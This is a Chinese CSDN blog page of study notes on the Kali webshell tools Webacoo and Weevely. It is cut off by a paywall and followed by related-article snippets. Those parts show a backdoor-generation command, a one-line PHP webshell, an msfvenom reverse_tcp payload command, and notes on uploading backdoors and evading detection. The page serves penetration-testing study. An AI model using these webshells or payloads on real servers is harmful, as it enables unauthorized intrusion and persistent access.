关于Kali的两个Webshell(Webacoo和Weevely)的学习笔记

最新推荐文章于 2024-07-31 16:43:02 发布
最新推荐文章于 2024-07-31 16:43:02 发布
阅读量6.4k 收藏 5
点赞数 1
分类专栏: Kali 工具 Web安全 文章标签: Kali 信息安全 Webshell Weevely Webacoo
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SKI_12/article/details/62239673
版权
本文介绍了Kali Linux自带的两种Webshell——Webacoo和Weevely的使用方法。Webacoo通过cookie头进行隐蔽通信,Weevely则是一个功能丰富的PHP Webshell,包含多个管理模块。文章详细讲解了如何生成服务端代码,上传到目标服务器,以及客户端如何连接,并提供了Wireshark抓包分析的内容。
摘要由CSDN通过智能技术生成

Webacoo和Weevely是在Kali中默认安装了的Webshell,下面将分开进行介绍。


Web Backdoor Cookie(Webacoo):

Webacoo的编码通信内容都是通过cookie头传输,隐蔽性强。

其Cookie头中的三个变量:

cm:base64编码的命令

cn:服务器用于返回数据的cookie头的名

cp:返回信息定界符


直接在终端输入webacoo即可启动。


生成服务端代码:

webacoo -g -o wbc.php

两个参数通常组合使用:-g参数生成后门代码;-o参数输出为一个文件。


可以通过cat命令来查看该文件的内容:

最低0.47元/天 解锁文章
Mi1k7ea
关注
专栏目录
webshell管理-WeBaCoo和Weevely
weixin_41082546的博客
03-19 217
WeBaCoo (Web Backdoor Cookie) 简介 类终端的shell,只针对 PHP 编码通信内容通过 cookie 头传输,隐蔽性较强 Cookie: cm=aWQ=; cn=M-cookie; cp=pMi~ cm:bash64 编码之后的命令 cn:服务器用于返回数据的 cookie 头的名 cp:返回信息定界符 生成服务器端 webacoo -g -o w...
KaLi学习教程
11-14
KaLI技术中文教程,值得学习入门,想学习攻防技术或者CTF值得一看
kali中的webshell工具--webacoo
weixin_30698527的博客
03-10 918
webacoo webshell其实就是放置在服务器上的一段代码 kali中生成webshell的工具 WeBaCooWeb Backdoor Cookie) 特点及使用方法 类终端的shell 编码通信内容通过cookie头传输,隐蔽性强 cookie中传递数据使用的参数: cm:base64编码的命令 cn:服务器用于返回数据的cooki...
什么是webshell 常见的webshell工具有哪些
最新发布
2302_76672693的博客
07-31 1016
什么是webshell 常见的webshell工具有哪些
如何学习KALI
weixin_30246221的博客
09-22 306
比视频教程书籍更有效的办法(这些全没用) 就是在命令行中输入工具名称和 -h进行查询 转载于:https://www.cnblogs.com/iamjuruo/p/7470955.html
Kali渗透测试_WebShell
分享学习网络的点点滴滴
08-29 620
中国菜刀可能被IDS、AV、WAF、扫描器软件发现查杀。
Kali工具-webshell之weevely
liwangjin0116的专栏
03-29 753
kali中常用的webshell工具-weevely,可以对网站的文件上传漏洞进行测试。
Kali linux 学习笔记(五十六)Web渗透——webshell(中国菜刀、webacoo、weevely) 2020.3.31
闵行小鱼塘
03-31 1219
学习webshell
kali下的webshell工具--weevely
老夏家的云
03-12 2338
Weevely -------------------------------------- 主要特点: 隐蔽的类终端的PHP webshell 30多个管理模块 执行系统命令、浏览文件系统 检查目标服务器的常见配置错误 基于现有连接,创建正向、反向的TCP shell连接 通过目标机器代理HTTP流量 从目标计算机运行端口扫描,渗透内网 支持连接密码 ...
kali渗透学习-Web渗透WebShell(中国菜刀、WeBaCoo、Weevely)
weixin_43239236的博客
01-23 856
Webshell 本质:<?php echo shell_exec($_GET['cmd']);?> 就是连接web执行一个shell终端,用一句话在浏览器中执行,不方便 windows平台 中国菜刀 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强  【但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/】 1、利用上传漏洞,先上传一句话木马【支持三种服务器端PHP、ASP、ASP.NET】 使用ssh连接metasploitabl
kali学习手册
12-10
Security Testing, Penetration Testing, and Ethical Hacking
kali学习资料.txt
09-20
51 cto整套kail教学资料,kali入门必备资料,让你快速玩转kali,云链接
Kali学习
七月_的博客
05-08 509
Kali在docker环境下搭建vulnhub靶场 下载、解压 wget https://github.com/vulhub/vulhub/archive/master.zip unzip ~ 复现Hadoop 未授权访问漏洞 配置环境 cd /vulhub/hadoop/unauthorized-yarn docker-compose up -d 访问http://your-ip:8088 即可看到Hadoop YARN ResourceManager WebUI页面 ...
kali学习
m0_64180167的博客
08-28 7735
首先我们了解kali的网络设置。
kali自带webshell位置
qq_44881113的博客
09-25 681
/usr/share/webshells/
kali下的webshell工具-Weevely
weixin_30457465的博客
03-11 661
Weevely ------------------------------------------------ 主要特点: · 隐蔽的类终端的PHP webshell · 30多个管理模块 o 执行系统命令、浏览文件系统 o 检查目标服务器的常见配置错误 o 基于现有连接,创建正向、反向的TCP shell连接 o 通过目标...
kali攻防第13章 Metasploit之生成webshell及应用
安全参透之旅
12-24 6387
Metasploit之生成webshell及应用   准备工具 1、kali 系统 IP 10.10.10.131 2、受害者机子 IP 10.10.10.130 3、使用工具 Metasploit   步骤:   1、在msf生成asp脚本木马 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.
Kali自带webshell客户端
Yale的博客
12-26 3453
0x01 第一个要介绍的是webacoowebacoo旨在通过HTTP在客户端和web服务器之间提供类似隐形终端连接。它是一个后渗透利用工具,能够维持对已被拿下的web服务器的权限访问。WeBaCoo可以绕过最新的AV,NIDS,IPS,网络防火墙和应用防火墙的检测,能够在被拿下的服务器中悄无声息的执行系统命令。 首先使用-h看看用法 简单的翻译如下: -g Generate bac...
Kali Linux中Dmitry与Weevely的使用教程
"这篇文档主要介绍了Kali Linux中两个重要的内置工具——Dmitry和Weevely的用途、使用方法以及它们的特点。" 一、Dmitry详解 Dmitry是一款强大的网络安全工具,用于对目标主机进行信息收集和渗透测试。它提供了多种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值